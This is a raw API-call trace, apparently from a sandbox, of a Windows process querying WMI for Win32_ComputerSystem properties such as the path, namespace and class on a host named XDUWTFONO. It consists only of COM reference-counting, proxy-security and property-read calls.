	[0263.399] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee6e4*=0x0, pszText=0x0 | out: puBuffLength=0x5dee6e4*=0x17, pszText=0x0) returned 0x0
	[0263.400] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee6e4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee6e4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.400] CoGetContextToken (in: pToken=0x5dee084 | out: pToken=0x5dee084) returned 0x0
	[0263.400] CoGetContextToken (in: pToken=0x5dee044 | out: pToken=0x5dee044) returned 0x0
	[0263.400] WbemLocator:IUnknown:AddRef (This=0x7f930c) returned 0x2
	[0263.400] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x5dee0c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee0bc | out: ppvObject=0x5dee0bc*=0x6365074) returned 0x0
	[0263.400] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x2
	[0263.400] IUnknown:AddRef (This=0x6365074) returned 0x3
	[0263.400] IEnumWbemClassObject:Clone (in: This=0x6365074, ppEnum=0x5dee6b8 | out: ppEnum=0x5dee6b8*=0x636513c) returned 0x0
	[0263.403] IUnknown:QueryInterface (in: This=0x636513c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x6365140) returned 0x0
	[0263.403] IClientSecurity:QueryBlanket (in: This=0x6365140, pProxy=0x636513c, pAuthnSvc=0x5dee3bc, pAuthzSvc=0x5dee3b8, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0, pImpLevel=0x5dee3ac, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4 | out: pAuthnSvc=0x5dee3bc*=0xa, pAuthzSvc=0x5dee3b8*=0x0, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0*=0x6, pImpLevel=0x5dee3ac*=0x2, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4*=0x1) returned 0x0
	[0263.403] IUnknown:Release (This=0x6365140) returned 0x1
	[0263.403] IUnknown:QueryInterface (in: This=0x636513c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee368 | out: ppvObject=0x5dee368*=0x7f95dc) returned 0x0
	[0263.404] IUnknown:QueryInterface (in: This=0x636513c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee364 | out: ppvObject=0x5dee364*=0x6365140) returned 0x0
	[0263.404] IClientSecurity:SetBlanket (This=0x6365140, pProxy=0x636513c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0263.409] IUnknown:Release (This=0x6365140) returned 0x2
	[0263.409] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x1
	[0263.409] CoTaskMemFree (pv=0x7f84f8) 
	[0263.409] IUnknown:Release (This=0x6365074) returned 0x2
	[0263.409] IUnknown:QueryInterface (in: This=0x636513c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedd10 | out: ppvObject=0x5dedd10*=0x7f95dc) returned 0x0
	[0263.409] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dedccc | out: ppvObject=0x5dedccc*=0x0) returned 0x80004002
	[0263.410] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dedbc0 | out: ppvObject=0x5dedbc0*=0x0) returned 0x80004002
	[0263.416] WbemLocator:IUnknown:AddRef (This=0x7f95dc) returned 0x3
	[0263.416] CoGetContextToken (in: pToken=0x5dedb58 | out: pToken=0x5dedb58) returned 0x0
	[0263.416] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedb40 | out: ppvObject=0x5dedb40*=0x7f953c) returned 0x0
	[0263.416] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f953c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedb48 | out: pCid=0x5dedb48*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.416] WbemLocator:IUnknown:Release (This=0x7f953c) returned 0x3
	[0263.417] CoGetContextToken (in: pToken=0x5dedb50 | out: pToken=0x5dedb50) returned 0x0
	[0263.417] WbemLocator:IUnknown:AddRef (This=0x7f95dc) returned 0x4
	[0263.417] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedbc4 | out: ppvObject=0x5dedbc4*=0x7f95c4) returned 0x0
	[0263.417] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x4
	[0263.417] WbemLocator:IRpcOptions:Query (in: This=0x7f95c4, pPrx=0x7f95dc, dwProperty=2, pdwValue=0x5dedbe8 | out: pdwValue=0x5dedbe8) returned 0x80004002
	[0263.417] WbemLocator:IUnknown:Release (This=0x7f95c4) returned 0x3
	[0263.417] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x2
	[0263.417] CoGetContextToken (in: pToken=0x5dedfc4 | out: pToken=0x5dedfc4) returned 0x0
	[0263.417] CoGetContextToken (in: pToken=0x5dedf84 | out: pToken=0x5dedf84) returned 0x0
	[0263.417] WbemLocator:IUnknown:AddRef (This=0x7f95dc) returned 0x3
	[0263.418] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x5dee000*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedffc | out: ppvObject=0x5dedffc*=0x636513c) returned 0x0
	[0263.418] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x3
	[0263.418] IUnknown:Release (This=0x636513c) returned 0x2
	[0263.418] IUnknown:Release (This=0x636513c) returned 0x1
	[0263.418] CoGetContextToken (in: pToken=0x5dee5b8 | out: pToken=0x5dee5b8) returned 0x0
	[0263.418] CoGetContextToken (in: pToken=0x5dee578 | out: pToken=0x5dee578) returned 0x0
	[0263.418] WbemLocator:IUnknown:AddRef (This=0x7f95dc) returned 0x2
	[0263.418] WbemLocator:IUnknown:QueryInterface (in: This=0x7f95dc, riid=0x5dee5f4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee5f0 | out: ppvObject=0x5dee5f0*=0x636513c) returned 0x0
	[0263.418] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x2
	[0263.419] IUnknown:AddRef (This=0x636513c) returned 0x3
	[0263.419] IEnumWbemClassObject:Reset (This=0x636513c) returned 0x0
	[0263.420] IUnknown:Release (This=0x636513c) returned 0x2
	[0263.421] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0263.421] IUnknown:AddRef (This=0x636513c) returned 0x3
	[0263.421] IEnumWbemClassObject:Next (in: This=0x636513c, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x316cc60 | out: apObjects=0x769e88*=0x635e398, puReturned=0x316cc60*=0x1) returned 0x0
	[0263.435] IUnknown:QueryInterface (in: This=0x635e398, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedab8 | out: ppvObject=0x5dedab8*=0x635e398) returned 0x0
	[0263.435] IUnknown:QueryInterface (in: This=0x635e398, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda74 | out: ppvObject=0x5deda74*=0x0) returned 0x80004002
	[0263.435] IUnknown:QueryInterface (in: This=0x635e398, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded968 | out: ppvObject=0x5ded968*=0x0) returned 0x80004002
	[0263.436] IUnknown:AddRef (This=0x635e398) returned 0x3
	[0263.436] CoGetContextToken (in: pToken=0x5ded900 | out: pToken=0x5ded900) returned 0x0
	[0263.436] IUnknown:QueryInterface (in: This=0x635e398, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x635e39c) returned 0x0
	[0263.436] IMarshal:GetUnmarshalClass (in: This=0x635e39c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8f0 | out: pCid=0x5ded8f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0263.436] IUnknown:Release (This=0x635e39c) returned 0x3
	[0263.436] CoGetContextToken (in: pToken=0x5ded8f8 | out: pToken=0x5ded8f8) returned 0x0
	[0263.436] IUnknown:AddRef (This=0x635e398) returned 0x4
	[0263.436] IUnknown:QueryInterface (in: This=0x635e398, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded96c | out: ppvObject=0x5ded96c*=0x0) returned 0x80004002
	[0263.436] IUnknown:Release (This=0x635e398) returned 0x3
	[0263.437] IUnknown:Release (This=0x635e398) returned 0x2
	[0263.437] CoGetContextToken (in: pToken=0x5dedd58 | out: pToken=0x5dedd58) returned 0x0
	[0263.437] CoGetContextToken (in: pToken=0x5dedd18 | out: pToken=0x5dedd18) returned 0x0
	[0263.437] IUnknown:AddRef (This=0x635e398) returned 0x3
	[0263.437] IUnknown:QueryInterface (in: This=0x635e398, riid=0x5dedd94*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dedd90 | out: ppvObject=0x5dedd90*=0x635e398) returned 0x0
	[0263.437] IUnknown:Release (This=0x635e398) returned 0x3
	[0263.437] IUnknown:Release (This=0x635e398) returned 0x2
	[0263.437] IUnknown:Release (This=0x635e398) returned 0x1
	[0263.437] IUnknown:Release (This=0x636513c) returned 0x2
	[0263.438] CoGetContextToken (in: pToken=0x5dee63c | out: pToken=0x5dee63c) returned 0x0
	[0263.438] IUnknown:AddRef (This=0x635e398) returned 0x2
	[0263.438] IWbemClassObject:Get (in: This=0x635e398, wszName="__GENUS", lFlags=0, pVal=0x5dee6b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee76c*=0, plFlavor=0x5dee768*=0 | out: pVal=0x5dee6b8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5dee76c*=3, plFlavor=0x5dee768*=64) returned 0x0
	[0263.438] IWbemClassObject:Get (in: This=0x635e398, wszName="__PATH", lFlags=0, pVal=0x5dee698*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee750*=0, plFlavor=0x5dee74c*=0 | out: pVal=0x5dee698*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x5dee750*=8, plFlavor=0x5dee74c*=64) returned 0x0
	[0263.438] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0263.438] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6f0 | out: ppv=0x5dee6f0*=0x718dec) returned 0x0
	[0263.438] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6e8 | out: pAptType=0x5dee6e8*=1) returned 0x0
	[0263.438] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6ec | out: ppvObject=0x5dee6ec*=0x0) returned 0x80004002
	[0263.439] IUnknown:Release (This=0x718dec) returned 0x1
	[0263.439] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee208 | out: ppv=0x5dee208*=0x6365178) returned 0x0
	[0263.439] WbemDefPath:IUnknown:QueryInterface (in: This=0x6365178, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee038 | out: ppvObject=0x5dee038*=0x0) returned 0x80004002
	[0263.439] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6365178, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee070 | out: ppvObject=0x5dee070*=0x635e7e0) returned 0x0
	[0263.439] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e7e0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede14 | out: ppvObject=0x5dede14*=0x635e7e0) returned 0x0
	[0263.440] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e7e0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddd0 | out: ppvObject=0x5deddd0*=0x0) returned 0x80004002
	[0263.440] WbemDefPath:IUnknown:AddRef (This=0x635e7e0) returned 0x3
	[0263.440] CoGetContextToken (in: pToken=0x5dedc5c | out: pToken=0x5dedc5c) returned 0x0
	[0263.440] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e7e0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc44 | out: ppvObject=0x5dedc44*=0x639a1b8) returned 0x0
	[0263.440] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x639a1b8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc4c | out: pCid=0x5dedc4c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.440] WbemDefPath:IUnknown:Release (This=0x639a1b8) returned 0x3
	[0263.441] CoGetContextToken (in: pToken=0x5dedc54 | out: pToken=0x5dedc54) returned 0x0
	[0263.441] WbemDefPath:IUnknown:AddRef (This=0x635e7e0) returned 0x4
	[0263.441] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e7e0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedcc8 | out: ppvObject=0x5dedcc8*=0x0) returned 0x80004002
	[0263.441] WbemDefPath:IUnknown:Release (This=0x635e7e0) returned 0x3
	[0263.441] WbemDefPath:IUnknown:Release (This=0x635e7e0) returned 0x2
	[0263.441] WbemDefPath:IUnknown:Release (This=0x6365178) returned 0x0
	[0263.441] WbemDefPath:IUnknown:Release (This=0x635e7e0) returned 0x1
	[0263.441] CoGetContextToken (in: pToken=0x5dee504 | out: pToken=0x5dee504) returned 0x0
	[0263.441] CoGetContextToken (in: pToken=0x5dee4c4 | out: pToken=0x5dee4c4) returned 0x0
	[0263.441] WbemDefPath:IUnknown:AddRef (This=0x635e7e0) returned 0x2
	[0263.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e7e0, riid=0x5dee540*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee53c | out: ppvObject=0x5dee53c*=0x635e7e0) returned 0x0
	[0263.442] WbemDefPath:IUnknown:Release (This=0x635e7e0) returned 0x2
	[0263.442] WbemDefPath:IUnknown:Release (This=0x635e7e0) returned 0x1
	[0263.442] CoGetContextToken (in: pToken=0x5dee584 | out: pToken=0x5dee584) returned 0x0
	[0263.442] CoGetContextToken (in: pToken=0x5dee544 | out: pToken=0x5dee544) returned 0x0
	[0263.442] WbemDefPath:IUnknown:AddRef (This=0x635e7e0) returned 0x2
	[0263.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e7e0, riid=0x5dee5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5bc | out: ppvObject=0x5dee5bc*=0x635e7e0) returned 0x0
	[0263.442] WbemDefPath:IUnknown:Release (This=0x635e7e0) returned 0x2
	[0263.442] WbemDefPath:IUnknown:AddRef (This=0x635e7e0) returned 0x3
	[0263.442] WbemDefPath:IWbemPath:SetText (This=0x635e7e0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0263.443] WbemDefPath:IUnknown:Release (This=0x635e7e0) returned 0x2
	[0263.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee724 | out: puCount=0x5dee724*=0x2) returned 0x0
	[0263.443] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee720*=0x0, pszText=0x0 | out: puBuffLength=0x5dee720*=0x17, pszText=0x0) returned 0x0
	[0263.443] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee720*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee720*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.443] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0263.443] IUnknown:AddRef (This=0x636513c) returned 0x3
	[0263.443] IEnumWbemClassObject:Next (in: This=0x636513c, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x316cc60 | out: apObjects=0x769e88*=0x0, puReturned=0x316cc60*=0x0) returned 0x1
	[0263.445] IUnknown:Release (This=0x636513c) returned 0x2
	[0263.445] CoGetContextToken (in: pToken=0x5dee5f4 | out: pToken=0x5dee5f4) returned 0x0
	[0263.446] WbemLocator:IUnknown:Release (This=0x7f95dc) returned 0x1
	[0263.446] IUnknown:Release (This=0x636513c) returned 0x0
	[0263.454] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0263.454] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0263.454] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.454] IWbemClassObject:Get (in: This=0x635e398, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316da88*=0, plFlavor=0x316da8c*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x316da88*=8, plFlavor=0x316da8c*=64) returned 0x0
	[0263.454] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0263.455] IWbemClassObject:Get (in: This=0x635e398, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316da88*=8, plFlavor=0x316da8c*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x316da88*=8, plFlavor=0x316da8c*=64) returned 0x0
	[0263.455] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0263.455] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0263.455] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0263.455] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.455] IWbemClassObject:Get (in: This=0x635e398, wszName="__CLASS", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316db40*=0, plFlavor=0x316db44*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x316db40*=8, plFlavor=0x316db44*=64) returned 0x0
	[0263.455] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.455] IWbemClassObject:Get (in: This=0x635e398, wszName="__CLASS", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316db40*=8, plFlavor=0x316db44*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x316db40*=8, plFlavor=0x316db44*=64) returned 0x0
	[0263.455] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.455] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0263.455] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0263.455] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0263.456] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0263.456] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.456] IWbemClassObject:GetNames (in: This=0x635e398, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5dee74c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5dee718 | out: pNames=0x5dee718*="\x01ƀ\x04") returned 0x0
	[0263.456] SafeArrayGetDim (psa=0x7f8598) returned 0x1
	[0263.456] SafeArrayGetDim (psa=0x7f8598) returned 0x1
	[0263.456] SafeArrayGetLBound (in: psa=0x7f8598, nDim=0x1, plLbound=0x5dee314 | out: plLbound=0x5dee314) returned 0x0
	[0263.456] IWbemClassObject:Get (in: This=0x635e398, wszName="__GENUS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e57c*=0, plFlavor=0x316e580*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x316e57c*=3, plFlavor=0x316e580*=64) returned 0x0
	[0263.457] IWbemClassObject:Get (in: This=0x635e398, wszName="__CLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e5b0*=0, plFlavor=0x316e5b4*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x316e5b0*=8, plFlavor=0x316e5b4*=64) returned 0x0
